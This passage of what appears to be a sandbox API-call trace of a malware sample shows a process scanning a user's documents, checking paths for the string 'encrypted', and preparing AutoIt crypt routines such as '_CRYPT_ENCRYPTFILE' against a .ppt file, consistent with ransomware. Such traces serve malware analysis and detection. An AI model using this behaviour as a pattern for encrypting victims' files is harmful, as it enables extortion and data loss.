lpString1="iAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ro_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0035.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0035.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0035.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0035.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c20c0 [0035.207] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0035.208] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0035.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0035.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0035.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5e8 [0035.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0035.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0035.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0035.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0035.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af348 [0035.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0035.208] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0035.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0035.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0035.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af478 [0035.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0035.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0035.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0035.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0035.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8896b8 [0035.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0035.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0035.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0035.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0035.209] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0035.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0035.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0035.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0035.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0035.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0035.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0035.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0035.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0035.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0035.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0035.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.210] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.210] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.210] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.210] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0035.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0035.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0035.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0035.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0035.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0035.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0035.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.210] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.210] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0035.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0035.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0035.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0035.210] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.210] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.210] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.210] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bbdb0e0, ftCreationTime.dwHighDateTime=0x1d5c475, ftLastAccessTime.dwLowDateTime=0x8e00b970, ftLastAccessTime.dwHighDateTime=0x1d5bb69, ftLastWriteTime.dwLowDateTime=0x8e00b970, ftLastWriteTime.dwHighDateTime=0x1d5bb69, nFileSizeHigh=0x0, nFileSizeLow=0x13eda, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="Vp6FryQ8WD7hsRBCHZV.ppt", cAlternateFileName="VP6FRY~1.PPT")) returned 0x7c2100 [0035.211] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0035.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0035.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.211] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.211] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0035.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0035.211] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.211] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0035.211] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0035.211] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.211] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0035.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0035.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0035.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0035.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0035.211] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.212] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.212] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0035.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0035.212] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.212] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0035.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0035.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0035.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0035.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0035.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0035.212] HeapFree (in: hHeap=0x770000, 